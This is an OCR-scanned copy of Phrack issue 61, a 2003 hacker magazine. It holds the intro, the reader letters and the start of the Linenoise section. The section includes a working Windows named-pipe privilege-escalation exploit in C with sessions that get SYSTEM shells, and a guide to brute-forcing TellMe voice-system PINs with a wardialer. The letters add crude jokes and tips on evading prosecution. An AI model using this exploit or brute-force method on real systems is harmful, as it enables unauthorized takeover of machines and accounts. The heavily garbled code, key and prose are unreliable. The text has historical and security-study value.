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PENG* PHRACK #61 is out. 


What’s new? 


P6l comes with a prophile again (DiGiT!). We changed the filenames of 
the articles (dos 8.3 is dead people!). I got bored of including this 
outdated and buggy phrack extraction utility in every phrack -- gone it iz! 
In this issue you’1ll find:16 jucy articles; a bunch of smaller articles (in 
linenoise); the usual 100% dumbness in loopback, and some Phrack World News 
with old skewl doodz. 


I admit it, we are 5 days behind the promised release date. Sorry. Some 
of you might already hav njoyed the beta-release that we gave out a few 
days ago to some authors and ircs junkees. Others might have spotted one of 
the many leaked (and modified) versions of these beta-releases. Be warned, 
we dont give any warranty for the correctness of the article or code, 
especially for an unofficial version. Hell, I saw one #61 version today 
which contains articles I’ve never seen before and a prophile of someone we 
would not prophile :> 


TO MAKE IT EASIER FOR YOU: ALL DA DOMAINZ ARE BELONG TO UZ. 
http://www.phrack.org <-- original 

http://www.phrack.com <-- old skewl 

http://www.phrack.net <-- donated 


Phrack got some media coverage for releasing the gps jammer article. We 
received a high amount of emails from .gov/.mil subdomains telling us that 
MS exchange cant read ’this strange uudecode format’. We amused ourself for 
8 month, thnx: http://www.phrack.org/dump/phrack_gps_jammer.png 


(= >) (3) 
/ 0x01 Introduction Phrack Staff 0x09 kb \ 
/ 0x02 Loopback Phrack Staff 0x0b kb \ 
/ 0x03 Linenoise Phrack Staff 0x33 kb \ 
ie 0x04 Toolz Armory Phrack Staff 0x06 kb x 
f 0x05 Phrack Prophile on DiGiT Phrack Staff 0x10 kb \ 
/ 0x06 Advanced Doug Lea’s malloc exploits jp Ox5c kb \ 
/ 0x07 Hijacking Linux Page Fault Handler buffer Oxlc kb \ 
/ 0x08 The Cerberus ELF interface mayhem Ox3f kb x 
/ 0x09 Polymorphic Shellcode Engine CLET team Oxfb kb \ 
/ OxO0a Infecting Loadable Kernel Modules truff 0x25 kb \ 
/ OxOb Building IA32 Unicode-Proof Shellcodes obscou O0x2d kb \ 
/ OxO0c Fun with Spanning Tree Protocol O.K. Artemjev 0x25 kb \ 
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Vladislav V. Myasnyankin 
OxOd Hacking da Linux Kernel Network Stack bioforge O0x4a kb 
OxOe Kernel Rootkit Experiences stealth 0x0c kb 
OxOf Phrack World News Phrack Staff 0x37 kb 


Morpheus: Do you believe in fate, Neo? 

Neo: No. 

Morpheus: Why not? 

Neo: Because I don’t like the idea that I’m not in control of 
my life. 

[ PHRACK, NO FEAR & NO DOUBT ] 


Ses a SS EARS: 
PG BE GOI GE GE" GE BEE PE 


Shoutz: justin, nar, muskrat, optimist, _dose and Hassanine Adghirni. 


Enjoy the magazine! 
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Contents Copyright (c) 2003 Phrack Magazine. All Rights Reserved. 

Nothing may be reproduced in whole or in part without the prior written 
permission from the editors. 

Phrack Magazine is made available to the public, as often as possible, free 
of charge. 


| [ € ON TOA Cot PHRACK MAGAZINE J]=--------- = 
Editors : phrackstaff@phrack.org 

Submissions : phrackstaff@phrack.org 

Commentary : loopback@phrack.org 

Phrack World News : pwn@phrack.org 


Note: You must put the word ’ANTISPAM’ somewhere in the Subject-line of 
your email. All others will meet their master in /dev/null. We reply to 
every email. Lame emails make it into loopback. 


Submissions may be encrypted with the following PGP key: 
(Hint: Always use the PGP key from the latest issue) 


SSS, BEGIN PGP PUBLIC KEY BLOCK--—---— 
Version: GnuPG v1.2.1 (GNU/Linux) 


mOQGiBD8t 30ARBACWTusKTxboeSode33ZVBx3AlLgMTO8POA+ssRyJkyVVbrruYLLY 
Bov43vxEsqLZXrfcuCd5ikKKk+wLEJESqValODEwaDeeyyPuUMctrr2UrrD1Z2MDT 
f7LVNdyYFD1LYzFwSc9sesrNQ78EOWalkHAGY1bUD2S7eilaEU9r/EUpFxwCgzLiq 
TV6rC/UzOWnt wRk+Ct 5u3 fUEAJVPIZCQ0d2 f2M11TOPNaJRxJIxseNQCbRINReT4 
FG4CSHGQMTEMrgROC0/Z9H/p4hb 422 fpPne3007YN jnzaDN65UmMYJDFUkKKiFaQNb 
upTcpOQESsCPvNt+tiaVkas37m1lNATKYb8dkKdiM12iTcJ7tNotN5IDJjeahNNivFv4k 
50p7A/0VBG80348MofsE4rN200w4 1 4d6yhZwmJ8G4jfu/OPgqonkt fNpnEBwl1 3RtLH 
cCXEKY5GY+A2AapDCOhqDdh5Fxq9LMLKF2hzZa5JHwp6HcevrYhlyJLW8 /uspVGTgP 
ZPx0Z3Cp4rkKmzoLcOjyvGbAWUhOWFodK+A4xbr 8bEg 9PH5qCurQ1lUGhyYWNrIFNO 
YWZmIDxwaHJhY2t zdGFmZkBwaHJhY2sub3JnPohfBBMRAgAfBOI/LdzgBOkDFWwOA 
BASHAwWIDFOQIDAxYCAQIeCAQIXgAAKCRC8vwVckO0UfSeolAJ42bPrG2LO0NluniFthn 
gY1x/9nUiACeJoS5StMK1lr/JcdKqeEfpNIm4GRmLag5Ag0EPy3dChAIALK9tVpuViImJ 
REXgf 4GeR4RkxpA0+8Z2RoO1TgESW6F fIQCCM8 TKeLuGWE2 jGKGWKt Z 6 8m+zxgYBK 
zZ+MOKFvldukt qQpyCJP/Mgdt 6yy2aSEq0ZqDlhogiGmoGd19L6+VD2kUN6EjWCiv 
5YikjgQaenSuUOmZZROwhuezxw9K4XgtLVGkgfqz82yTGwaoU7HynqhJr7UIxdsxx 
dr+y7adlclR/OgAFg294fmffX6UkKBjD5c2MixX/axlb6rpDqZiilTJozeeeM7XalAj 
5SlgLLuFZctcwZjItrK6fANVjnNrEusoPnrnis4FdQi 4MuYbOATNVKPO0O0iFGLNGON 
qqvHAsDtDTCABASH/1zrZyBskztS88voQ2EHRR+bigpIFS1zOtHVDNnryluF25nM 
yWV10NebrEVid/Um2xpB5qFnZNO1QdgqUTIpkKY+pqJd3mfKGepLhOqthgSe2 9HP 
45V6S6ujLO4dcaHg9PKVdhyA2T 4z1/1FAZeCxtigSvtD8t 5p/1ifFIDDI9MrqAVR 
llsSwfB8qWwcKtMNVOWH6g2zZHI1A1G0M42depD50WvdQbKWep/ESh1uP5519UvhCl 
mQLPI6ASmwlUGgO0YZTuEwul75ExaFelt2TJjciM5m/zxSZPJQFueB4vsTuhlQICci 
MXt 5BXWyqYnDop8 8 5WR2 jJHSHyENOxQRadlv3yF 61 TAQYEQIADAUCPy3daCgUuJAxcE 


GJ 
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AAAKCRC8vwVck0OUfS£L/AJ9ABdnRIJsp6rNM4BOPKJ7shevE1WACdHGebIKoidGJh 
nntgUuSbqNtS51Uo= 

=FnHK 
Se END PGP PUBLIC KEY BLOCK----- 


phrack:~# head -22 /usr/include/std-disclaimer.h 
/* 


* 


A information in Phrack Magazine is, to the best of the ability of 
the editors and contributors, truthful and accurate. When possible, 
all facts are checked, all code is compiled. However, we are not 
fe) 
s 
at 


mniscient (hell, we don’t even get paid). It is entirely possible 
omething contained within this publication is incorrect in some way. 
f this is the case, please drop us some email so that we can correct 
it in a future issue. 


Also, keep in mind that Phrack Magazine accepts no responsibility for 
the entirely stupid (or illegal) things people may do with the 
information contained herein. Phrack is a compendium of knowledge, 
wisdom, wit, and sass. We neither advocate, condone nor participate 
in any sort of illicit behavior. But we will sit back and watch. 


Lastly, it bears mentioning that the opinions that may be expressed in 
the articles of Phrack Magazine are intellectual property of their 
authors. 

These opinions do not necessarily represent those of the Phrack Staff. 


+ + + + FF + + + + FF F FF FF FF FF FF FF F OF 
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==Phrack Inc.== 


Issue O0x3d, Phile #0x02 of Ox0f 


[ LOOPBACK 


] 


The good stuff. 


The funny stuff 


Russian interview: 


GPS Jammer hypes 
1] http://computerwor] 
2) http://computerworl] 
3] http://computerwor] 
4 

www.madonna.com hacked, 
1 
2 


Quote of the day 
"Give me 


We receive a lot of stupid emails as par for the course 


http: //www.bugtraq. 


http://www.thesmokinggun.com/archive/madonnasplashl 
http://www.cnn.com/2003/T 


[ Phrack Staff ] 


http://segfault.net/~ bbp/BSD-heap-smashing.txt 


(defaced openbsd poster). 
http://stargliders. 


org/phrack/mmhs. jpg 


ru/library/underground/phrack.html 


ld.com/industrytopics/defense/story/0,10801,77702,00.html 
ld.com/governmenttopics/government/story/0,10801,79783,00.html1 
ld.com/securitytopics/security/story/0,10801,77702,00.html1 


http: //www.phrack.org/dump/phrack_gps_jammer.png 


phrack is innocent. 
ehtml 
ECH/internet/04/28/hackers.madonna.reut/index.html 


(as seen on irc): 
an eMail and I’1l1 move the world." 


in each round 


of phrack. However, we have some real gems for you this time. Ok, let’s 
see with what lameness the audience came up with. 

Enjoy Loopback :> 

[=[ 0x01 ] 

From: echo_zero@mail.com 


yo... wassup ppl? 
lengedary group! 


live the hackers! 


the great masters r all here... 
u have done for hacking community. 


Congratulations for all 


i wish to be like u some day. long 


STAY COOL 
BE HAPPY 
[ yO, da great masta speaking. Thnx bro! EnjOy #61. Keep it r3al! ] 
[=[ 0x02 ] 
From: '; OR --%20 
[ note his elite technique ] 


Hi, 


this is me checking if i 


can inject SQL commands into thy webservor. 


Article’s awesome. 


[ did it work? ] 


0x03 


] 


From: 
Subject: 


"scott johnstone'" 
B 


Greets. 


iT 


<bollocks777@hotmail.com> 


r Generator ANTISPAM 
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It occurs to me that an interesting way to generate some operating capital 
for Phrack would be to sell to spammers the e-mail addresses of all the 
Silly newblets that ask for basic hacking tutorials and shit like that. 


Granted it wouldn’t be financing any phrackmobiles with rocket boosters but 
it might pay for a 6-pack for the guy who handles the loopback ;) 


[ done. now hurry up and order some of that penis enlargement cream 
we get 20% ] 


[=[ 0x04 ] 


From: <zyx@illrepute.org> 
Subject: your PGP key 


What the hell is the point of posting a PGP key that has only this 
many Signatures? 


S gpg --list-sigs phrackstaff 


pub 1024D/3EEEDCE1 2001-05-05 phrackstaff <phrackstaff@phrack.org> 
sig EF881DEC 2001-03-03 Binary Fusl0n <binaryfusl0n@hotmail.com> 
sig D7C776BF 2001-03-03 [User id not found] 
sig T5E90D2C 2001-12-29 Calle Lidstrom <calle@swip.net> 
sig 3 3EEEDCE1 2001-05-05 phrackstaff <phrackstaff@phrack.org> 
sub 2048g/1B6B493C 2001-05-05 [expires: 2031-04-28] 
sig 3EEEDCE1 2001-05-05 phrackstaff <phrackstaff@phrack.org> 

[ Conclusion: Not our key. 

Cause: Someone tricked you. 


Solution: Get our latest key from the latest phrack release. 
Remember: Stop writing us. You suck. ] 


|=[ 0x05 ] 
From: serased@yahoo.com 
y’all suck 


you guysa are illegal and you know it 
can’t wait till the government bust your ass 


[ we might be illegal, but we can frame you for it ] 


[=[ 0x06 ] 


From: Furys_Child@hotmail.com 
Subject: Phrack Loopback 


Hello anyone, 


I am sending out this message to ask for help. I want to learn the basics 
of hacking any way I can. 


[ Today’s lesson: "How to get subscibed to a paedophile mailing list" 
Step 1. Ask phrackstaff to teach you how to hack 
Step 2. Wait ] 


[=[ 0x07 ] 


From: changiz_a@yahoo.com 
Subject: Hide phone number 


I want to others can not see my phone number (home phone and cell phone) 
how can I do this ? 


[ by not using the phone. ] 
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|=[ 0x08 ] 


From: Glenn Wekony <ayce57@yahoo.com> 
Subject: Re: Message from Glenn Wekony ANTISPAM 


[ ... a bunch of lame questiones about wifi hacking here ... ] 


[ .. ] I am delibrately using my real name and am not a police officer or 
a federal agent. I tell you this in the hope you will answer my e-mail and 
not sound suspicious. If you do not return my e-mail, I understand. 


Thanx, Glenn. 


[ No doubt you are not a fed. The feds stopped bugging us about 
wifi hacking techniques when they figured out how to use google. ] 


[=[ 0x09 ] | 
From: Max Gastone <banangling@yahoo.com> 


Would Phrack be interested in an article on how 
current radical environmental & animal rights groups 
are using the internet and email systems against 
target companies, in particular taking on large 
company’s email systems and giving them a hammering 
using novel protests techniques akin to DDoS (but not 
quite that)? Would include info on several software 
tools developed solely for this purpose. 


VVVVVV VV 


[ "When I was a child, 
I talked like a child, 
I thought like a child, 
I reasoned like a child. 
When I became a man, 
I put childish ways behind me." 
(the holy bible, Paul, in his first letter to the Cor. 13:11). ] 


|=[ Ox0a ] | 


I need to be a haX0Or says my mUm. bcuse I jerk off too much and I need 
somthing better to do wiht the 2 hours my mom lets me have to use the 
FaMily winbook. My Unckle billlyfish (his fucking hacksor name) told me 
that if I brake N2 nasa and steal the new rockit blueprints then give them 
to you so we/you or us/me can get together all of the Oday hackers (im not 
gay...just curious) and fly off to amsterdam where Heroin is legal that you 
will give me a hard copy set of Phrack issues 1-50. Piss on them who dont 
like shit. lol. hahaha lamers suck. I am only 27 but I should be sneaking 
out of my moms basement soon...like tonight to go to an internet cafe to 
masturbate because my 2 hours of Pleasureful winbook time are almost over. 
If you can muster up the fucking strengh tell me how to brake into nasa so 
i can claim me prize mate I would be as gracious as a dog with peanut 
butter SpoOned up his asS. 


[ Actually you sounded quite smart until the last 2 sentences ] 


PS If you make funny out of me then I promise I wont send the rocketshit 
planz to you and I will keep them for myself and take all of the hardcopys 
out of the back of that mini-gurlish SUV when i gets to holland. Dig. By 
the way, after we work out a deal, you can send me my hard copy set 
through my paypal account. (I have the biggest eshop on geocities...) 


[ Fortunately, it’s over, you started to become boring ] 


[=[ Ox0b ] 
From: unit321 <bigshot@almerger.com> 


if i put a disclaimer on my phrack submission, will anyone be able to 


2.txt Wed Apr 26 09:43:44 2017 4 


prosecute me? in the USA? 


[ Depends on which country you live in. Some countries tend to 
change the law whenever a new president is in charge. 
A disclaimer seldomly helps. Known technniques like leaving the 
country or using an anonymous email account do help. ] 


[=[ 0x01 ] 


Hello, 
Are you being harrased by government or law enforcement? 


[ Of course we are! ] 


[=[ Ox0c ] 


From: d.r.hedley 
Subject: question 


I was wanting to look at your anarchy cookbook iv,ver 4.14. but when i go 
to it. it says to 


VY O<SSSScesS set your browser to this width minimal ------- Poe 


it say’s that if you set your browser to the width proposed, then you’1ll 
have no problem viewing the cookbook. 


Question: how do you set your browser to the arrows that you have too - to 
be able to view the anarchist cookbook iv, ver 4.14 


[ It’s a secret cipher. Put your monitor upside down. There are some 
wheels or some buttons at the bottom of you monitor. Use them to 
adjust the horizontal width. Enlighted? ] 


|=[ Ox0d ] 
Hiya guys, Bread here. 

[ HIYA! staff-grunt here. ] 
Just thought I’d try and submit an article. If I am 


successful, many more articles will be one there way. Its’ an article on 
the Ping Command which I wrote about a month ago. 


Anyway, I hope you enjoy it and are able to actually publish it. 
Thanks for your time, 
Bread 


[ Can’t wait to read the other articles. Please go ahead an email them 
to us. All the serious articles have to be send to 
loopback@phrack.org from now on. 


To the content: Be warned, once you discover the -f flag you are 
close to discover winnuke, bo2k, 


We compressed your article to 1 line and will publish it right here: 
S ping -h 


Regards, 
Phrack Staff ] 


l=[ Ox0e ] 
From: "Ludoot je" 


[ Luser saying that we should publish an article he already published 
elsewhere, citing as a precedent "The Hackers Manifesto". ] 
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" [{..] but I suppose "The Hackers Manifesto" wasn’t first posted on 
phrack. 35." 


[ It was. 1986. http://www.phrack.org/phrack/7/P07-03.  ] 


[=[ Ox0f ] 
to actually make use of the Phrack article: 


"Below is the schematic diagram (gps_jammer.ps) in an uuencoded gzipped 
PostScript file. This is the native Xcircuit[12] format and is used for 


ease of viewing, printing and modification." 


How many FBI agents weaned on Windows will it take to get past the first 
hurdle: uuencoded? 


[ So many that after 8 month we decided to help them out: 
http://www.phrack.org/dump/phrack_gps_jammer.png 
Or for the advanced agent: 


S uudecode p60-0x0d.txt && gunzip -d gps_jammer.ps.gz && \ 
gv gps_jammer.ps 
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==Phrack Inc.== 


Volume 0x0b, Issue 0x3d, Phile #0x03 of Ox0f 


| [ LINENOTIS 


al 


] 


| [ 


Phrack Staff ] 


Everything that does not fit somewhere else can be found here. 


Corrections and additions to previous articles, to short articles or 


articles that just dont make it....everything. 
Contents 
1 —- Windows named pipes exploitation by DigitalScream 
2 —- How to hack into TellMe by Archangel 
3 - Shitboxing by Agent5 
4 —- PalmMap v1.6 - Nmap for Palm by Shaun Colley 
5 - Writing Linux/mc68xxx shellcode by madcr 
6 - Finding hidden kernel modules (th xtrem way) by madsys 
7 — Good old floppy bombs by Phrick 


| 
|=-=[ 1 - Windows named pipes exploitation ] 
| 


by DigitalScream <digitalsream at real.xakep.ru> / SecurityLevel5 


All latest versions of Microsoft Windows family operat 


based on Windows NT kernel. 


and local security of Windows world. There are still 
though allowing obtaining Local System privileges on the local computer 
compromise. Usually this is because 


leading to the full system 
different buffer overruns in 
case of any operation system. 


stack or heap in system 
However we should not fo 


ion systems are 


This fact has positive impact for both remote 


some thin places 


services, like in 
rget about system 


specific bugs because of abnormal behavior of system functions. This kind 
of bugs is very system dependant and from time tot 
in different OS. Of cause, Windows is not exception. 


Specific bugs are usually having impact on local users. 
not a kind of axiom, but local user has access to 


the system API functions comparing with remote one. S 
about possibility for local user to escalate his 


ime is discovered 


Of cause, this is 
larger amount of 
Oo, we are talking 

privileges. By 


privilege escalation we mean obtaining privileges of Local System to have 


no limitations at all. Now 


about new one. 


According to MSDN to launch 


there are few ways to ge 


application with different 


use LogonUser() and CreateProcessAsUser() functions. Log 
username and password for account we need. ’LogonUser()’ 


SE_ASSIGNPRIMARYTOKEN_NAME 


and SE_INCREASE QUOTA_NAME 
access token. This privileges are required for CreateProc 


system processes have these privileges. Actually ‘Admin 


have no enough right for CreateProcessAsUser(). So, 


application, e.g. ‘’cmd.exe’ 


with LocalSystem account 


t it, I will talk 


account one must 
onUser() requires 
task is to set 

privileges for 
essAsUser(). Only 
istrator’ account 
to xecut som 

we must have it 


already. Since we do not have username and password of privileged user we 


need another solution. 


In this paper we will obtain 


‘LocalSystem’ privileges 


API. To open file Windows application call CreateFile() 


below: 


HANDLE CreateFile ( 
LPCTSTR 
DWORD 
DWORD 


lpFileName, 
dwDesiredAccess, 
dwShareMode, 


with file access 
function, defined 
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LPSECURITY_ATTRIBUTES lpSecurityAttributes, 
DWORD dwCreationDisposition, 
DWORD dwFlagsAndAttributes, 
HANDLE hTemplateFile 


To open file we must call something like 


HANDLE hFile; 
hFile=CreateFile(szFileName, GENERIC_READ, FILE SHARE READ, NULL, 
OPEN_EXISTING, FILE _ATTRIBUTE_NORMAL, NULL); 


For advanced Windows programmer it’s clear that this function has more 
application rather than only opening ordinary files. It’s used to 
openor create new files, directories, physical drives, and different 
resources for interprocess communication, such as pipes and mailslots. 
We will be concerned with pipes. 


Pipes are used for one-way data exchange between parent and child or 
between two child processes. All read/write operations are close to 
thesame file operations. 


Named Pipes are used for two-way data exchange between client and server 
or between two client processes. Like pipes they are like files, but can 
be used to exchange data on the network. 


Named pipe creation example shown below: 


HANDLE hPipe = 0; 
hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX, 

PIPE_TYPE_MESSAGE|PIPE_WAIT, 2, 0, 0, 0, NULL); 

| | 


Named pipe’s name can vary, but it always has predefined format. 
The example of valid name is ’\\.\pipe\GetSys’. For Windows, ’\\.\’ 
sequence always precedes filename, e.g. if "C:\boot.ini" is requested 


system actually accesses ’\\.\C:\boot.ini’. This format is compatible 
with UNC standard. 


With basic knowledge of named pipes operations we can suppose there can be 
a way to full application to access named pipe instead of user supplied 
file. For example, if we created named pip "\\.\pipe\GetSys" we can try 
to force application to access "\\ComputerName\pipe\GetSys". It gives us a 
chance to manipulate with access token. 


Impersonation token is access token with client’s privileges. That is, 
this is possibility for server to do something on client’s behalf. In our 


case server is named pipe we created. And it becomes possibl because w 
are granted SecurityImpersonation privilege for client. More precisely, w 
can get this privilege. If client application has privileges of local 


system we can get access to registry, process and memory management and 
another possibilities not available to ordinary user. 


This attack can be easily realized in practice. Attack scenario for this 
vulnerability is next: 


1. Create name pip 


Wait client connect after named pipe is created. 


2. Impersonate client 


Because we assume client application has system rights we will have them 
too. 


3. Obtain required rights. In fact, we need only 


—- SE_ASSIGNPRIMARYTOKEN_NAME 
SE_INCREASE_QUOTA_NAME 
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This is all we need for CreateProcessAsUser() function. To obtain rights 
need new token with TOKEN_ALL ACCESS privelege. And we can do it, 


we 


TOKEN_ALL_ ACCESS 
TOKEN _DUBLICATE 


because we have privileges of client process. 


It 


Execute code of our choice 


could be registry access, setting some hooks or random commands with 


system privileges. Last one is most interesting, because we can execut 
standalone application of our choice for our specific needs. 


As 


privil 


it was said before, now I can execute CreateProcessAsUser() with system 
leges. I back to beginning, but this time I have all required 


privileges and ’LocalSystem’ is under my thumb. 


There is no problem to realize this approach. As an example, we will use 
working exploit by wirepair at shOdan.org based on the code 
of maceo at dogmile.com. 


// 


// 
// 


include <stdio.h> 
include <windows.h> 


int main(int argc, char **argv) 


char szPipe[64]; 


DWORD dwNumber QO} 

DWORD dwType = REG_DWORD; 
DWORD dwSize = sizeof (DWORD) ; 
DWORD dw = GetLastError(); 
HANDLE hToken, hToken2; 


U 
Q 
Ed | 
2 

a 


E ERIC_MAPPING pGeneric; 
SECURITY_ATTRIBUTES sa; 
DWORD dwAccessDesired; 
PACL pACL = NULL; 
PSECURITY_DESCRIPTOR pSD = NULL; 
STARTUPINFO si; 
PROCESS_INFORMATION pi; 


if (argc != 2) { 
fprintf(stderr, "Usage: %s <progname>\n", argv[0]); 
return 1; 


} 


memset (&Ssi,0,sizeof(si)); 
sprintf(szPipe, "\\\\.\\pipe\\GetSys") ; 


create named pipe"\\.\pipe\GetSys" 


HANDLE hPipe = 0; 
hPipe = CreateNamedPip (szPipe, PIPE_ACCESS_DUPLEX, 
PIPE TYPE _MESSAGE|PIPE_ WAIT, 2, 0, 0, 0, NULL); 
if (hPipe == INVALID_HANDLE_VALUE) { 
printf ("Failed to create named pipe:\n %s\n", szPipe); 


return 2; 


} 


printf ("Created Named Pipe: \\\\.\\pipe\\GetSys\n") ; 


initialize security descriptor to obtain client application 
privileges 

pSD = (PSECURITY_DESCRIPTOR) 

LocalAlloc (LPTR, SECURITY_DESCRIPTOR_MIN_LENGTH) ; 
InitializeSecurityDescriptor(pSD, SECURITY_DESCRIPTOR_REVISION) ; 
SetSecurityDescriptorDacl (pSD, TRUE, pACL, FALSE); 
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sa.nLength = sizeof (SECURITY_ATTRIBUTES) ; 
sa.lpSecurityDescriptor = pSD; 
sa.bInheritHandle = FALSE; 


printf ("Waiting for connection...\n"); 


// wait for client connect 
ConnectNamedPipe (hPipe, NULL); 


printf ("Impersonate...\n"); 
// impersonate client 
if (!ImpersonateNamedPipeClient (hPipe)) { 
printf ("Failed to impersonate the named pipe.\n"); 


CloseHandle (hPipe) ; 
return 3; 


} 


printf ("Open Thread Token...\n"); 


// obtain maximum rights with TOKEN_ALL_ACCESS 


if (!OpenThreadToken (GetCurrentThread(), 
TOKEN_ALL ACCESS, TRUE, &hToken )) { 
if (hToken != INVALID HANDLE VALUE) { 
printf ("GetLastError: %u\n", dw); 


CloseHandle (hToken) ; 
return 4; 


} 


printf ("Duplicating Token...\n"); 


// obtain TOKEN_DUBLICATE privilege 
if (DuplicateTokenEx (hToken, MAXIMUM_ALLOW 
&sa,SecurityImpersonation, 
TokenPrimary, &hToken2) == 0) { 


ea 
=] 
s 


printf ("error in duplicate token\n"); 
printf("GetLastError: %u\n", dw); 
return 5; 


} 


// fill pGeneric structure 
pGeneric = new GENERIC_MAPPING; 
pGeneric-—>GenericRead=FILE_GENERIC_READ; 
pGeneric-—>GenericWrite=FILE_GENERIC_WRITE; 
pGeneric-—>GenericExecute=FILE_GENERIC_EXE 
pGeneric-—>GenericAl1=FILE_ALL ACCESS; 


MapGenericMask( &dwAccessDesired, pGeneric ); 


dwSize = 256; 
char szUser[256]; 
GetUserName(szUser, &dwSize); 


printf ("Impersonating: %s\n", szUser); 


ZeroMemory( &Si, sizeof (STARTUPINFO) ); 


si.cb = sizeof(si); 

si.lpDesktop = NULL; 

si.dwFlags = STARTF_USESHOWWINDOW; 
si.wShowWindow = SW_SHOW; 


printf ("Creating New Process %s\n", argv[1]); 
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// create new process as user 
if (!'!CreateProcessAsUser (hToken2,NULL, argv[1], &8a, 
&Sa,true, NORMAL PRIORITY_CLASS | 
CREATE_NEW_CONSOLE,NULL,NULL,&Si, &pi)) { 
printf ("GetLastError: %d\n", GetLastError()); 


} 


// wait process to complete and exit 
WaitForSingleObject (pi.hProcess, INFINIT! 
CloseHandle (hPipe) ; 


Gl 
~~ 
~ 


return 0; 


} 


This vulnerability gives a chance for us to obtain system privileges on 
local computer. The only condition is system process must access this 
channel. This condition is easy to reproduce with system services. 


For example: 


[shell 1] 


>pipe cmd.exe 
Created Named Pipe: \\.\pipe\GetSys 
Waiting for connection... 


[shell 2] 
>time /T 
18:15 


>at 18:16 /interactive \\ComputerName\pipe\GetSys 


New task added with code 1 


[shell 1] 

Impersonate... 

Open Thread Token... 
Duplicating Token... 
Impersonating: SYSTEM 
Creating New Process cmd.exe 


Now we have new instance of cmd.exe with system privileges. It means user 
can easily obtain privileges of local system. Of cause reproduce this 
Situation is easy only in case, there is a service, which can access files 
on user request. Because ‘at’ command requires at least power user 
privileges and may be used to launch cmd.exe directly, without any named 
pipe this example is useless. 


In practice, this vulnerability may be exploited for privilege escalation 
by the local user if Microsoft SQL Server is installed. SQL server runs 
with system privileges and may be accessed with unprivileged user. @Stake 
reported vulnerability in xp_fileexist command. This command checks for 
file existence and we can use it to access our named pipe. Attack scenario 
is nearly same: 


[shell 1] 


>pipe cmd.exe 
Created Named Pipe: \\.\pipe\GetSys 
Waiting for connection... 


[shell 2] 


C:\>isql -U user 
Password: 
1> xp_fileexist ’\\ComputerName\pipe\GetSys’ 
2> go 
File Exists File is a Directory Parent Directory Exists 
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1 0 1 
[shell 1] 
Impersonate... 
Open Thread Token... 


Duplicating Token... 
Impersonating: SYSTEM 
Creating New Process cmd.exe 


At the end, it’s good to point that this vulnerability exists in 
Windows NT/2000/XP and is patched with Windows 2000 SP4 and 
on Windows 2003. 


A big thank to ZARAZA(www.security.nnov.ru), without him, nothing could be 
possible. 


1] Overview of the "Impersonate a Client After Authentication" 
http://support.microsoft.com/default.aspx?scid=kb; [LN]; 821546 


2] Exploit by maceo 
http: //www.securityfocus.com/archive/1/74523 


3] Exploit by wirepair 
http: //www.securityfocus.com/archive/1/329197 


4] Named Pipe Filename Local Privilege Escalation 
www.atstake.com/research/advisories/2003/a070803-1.txt 


5] Service Pack 4 for Windows 2000 
http://download.microsoft.com/download/b/1/a/ 
bla2a4df-cc8e-454b-ad9f-378143d77aeb/SP4express_EN.exe 


| 
|=-=[ 2 - How to hack into Tellme ] 
| 


How to get into the Tell-Me network. 
(1-800-555-tel11) 


This is a representation of someone’s thoughts. Thoughts cannot be 
owned by another person. Use this thought as you see fit, it is yours to 
duplicate or use as you please. 


By Archangel (Formerly of the P.H.I.R.M.) 
Archangel Systems 
http://the.feds.are.lookingat.us 


What is the Tell-Me system? 


TellMe is a high-tech voice activated phone site with internet 
connectivity, and even a voice activated browser. It is the ultimate goal 
of TellMe to have the whole of the internet voice activated. The system is 
quite sophisticated by today’s standards, though I’m sure that tomorrow’s 
readers will find the efforts to be quite primative to say the least. A 
free phone call gives the listener access to news, sports, weather, etc. 
Even movie listings. Other areas provide for private announcements, or even 
voice activated web-sites. In other words, it is now possible, through 
TellMe, to dial a phone number, and listen to a website. 


Tell me is a subsidiary of CNET, a giant (at the time of this writing) 
on the internet. 
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What security flaws were exploited? 


Well, I guess it’s nut-cutting time. TellMe has a VERY SERIOUS security 
flaw which can allow unauthorized access to the system within a matter of 
hours. As I tried to hack into my own account, I realized that TellMenu 
announcements only have a 4 digit numeric password. 


Here’s what you do: 

—- You dial 1-800-555-tell. 

—- You will get an automated banner-ad followed by a menu discribing 
various TellMe features. 

—- You must say the word "Announcements", or dial "198" on the keypad. 

This will take you to the announcements area. 

—- Once in the announcements area, you will need to punch in the 

announcement number, which is a seven digit number assigned to you by the 
TellMe computer. 

- Type in any announcement number you wish (I tried with my own one first, 

as this was an experiment to see if I could hack in and change my own 

announcement). 
The computer says "Ok, here is your announcement." 
Then I heard a recording of The Baron Telling what a whimp I am. 

- This was followed by the computer saying: 
Please type in another announcement number, or say "Main Menu" to 
continue. If you are the announcement manager, please use you telephone 
keypad to enter your password to edit the announcement. If you remain 
silent, the computer will say: "Please enter your 4 digit password." 


Were they serious? 


Now here’s the kicker: 

TELLME WON’T DISCONNECT YOU IF YOU FAIL 3 TIMES IN A ROW!!! 

Yes, ladies and gentlement, keep trying to your heart’s content. 
No penalties. 


Obviously a Brute Force hack was in order. I handled it by dusting off a 
*VERY* old wardialer. 


I sat on an extention line, due to the limitations of the dialer, and 
listened to it punching in access codes. When it succeeded, I could pause 
the wardialer program. I would be able to look at the screen, and see what 
the last couple of attempted numbers were, manually dial them in, and gain 
access. I know there ar asier methods, but this is what I did. 


The Baron had mercifully chosen a low number, and I was in, changing 
the message in about ten minutes. I then tried two other *SAFE* messages, 
that I would not get in trouble for, if changed. I gained access, 
respectively, in 45 and 90 minutes (More or less). My math told me that the 
maximum time to Brute Force a TellMe announcement was about three hours. 


Is that it? 
No, while having the ability to change any announcement may be a lot of 
fun, there is a far more intersting hack that you can do on TellMe. 
Remember how when you first sign on, you have to say "announcements"? 
Try saying the word "Extensions". You may be quite surprised at what you 
find. 


What are Tell-M xtensions? 


Tell-Me extensions are that part of the Tellme network, which they 
have offered to the world to produce the voice activated web pages. Her 
is what you do. 


iv 


- Say "Extensions". You will be taken to the extensions area, and asked to 
punch in an extension number. This is a five digit number. It was time 
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again for my ancient wardialer to do it’s stuff. (Once again, no penalty 
for incorrect guesses!) 


First off, it is important at this point to mention that TellMe is a 
dying concern. Most of the extensions are empty. The only extensions still 
operating, are some extensions created by individual developers, Die-hard 
developers, and (This is important later) TellMe’s *own* extensions. 


Apparently, the idea was to use the extension number as a kind of 
password, as there is no directory, and one must already know the extension 
number in order to gain access. 


I checked into The San Remo hotel here in Las Vegas, under my 
girlfriend’s name, and spent the night hacking. Here’s what I have come up 
with so far: 


Extension 76255: 


This leads to a very bizarre game of Rock/Paper/Scissors. It is one of 
the wierdest things that I have ever come across in all my days. I HIGHLY 
